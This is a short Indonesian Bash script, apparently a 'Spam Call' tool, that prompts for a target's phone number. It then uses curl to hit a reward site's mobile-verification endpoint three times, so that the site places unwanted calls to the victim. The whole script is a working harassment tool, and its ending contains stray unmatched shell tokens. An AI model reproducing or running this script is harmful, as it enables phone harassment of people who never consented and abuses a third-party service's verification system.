

clear

red="\033[1;31m"
blu="\033[1;96m"
whi="\033[1;97m"

sleep 1
echo
echo "${blu} [!] Loading Cuk. . ."
sleep 1
echo "${blu} Orang sabar di sayang tuhan:)"
sleep 10
clear
figlet Spam Call | lolcat
sleep 1
echo
sleep 1

echo "${blu}--------------------------------------"
echo "${whi} Author :${blu} MR.GRIMX72"
echo "${whi} Youtube:${blu} Belum Ada"
echo "${whi} Version:${blu} Spam Call V4"
echo "${blu}--------------------------------------\n${whi}"

          
sleep 1
read -p "[+] Masukan No Target : " no
link="https://id.jagreward.com/member/verify-mobile/$no"
echo
sleep 5
echo "${blu}[1].Spam Call Succes:)"
curl -s $link
sleep 5
link2="https://id.jagreward.com/member/verify-mobile/$no"
echo
sleep 5
echo "${blu}[2].Spam Call Succes:)"
curl -s $link2
link3="https://id.jagreward.com/member/verify-mobile/$no"
echo
sleep 5
echo "${blu}[3].Spam Call Succes:)"
curl -s $link3
sleep 1
echo
figlet Selesai | lolcat
exit
fi
;
echo
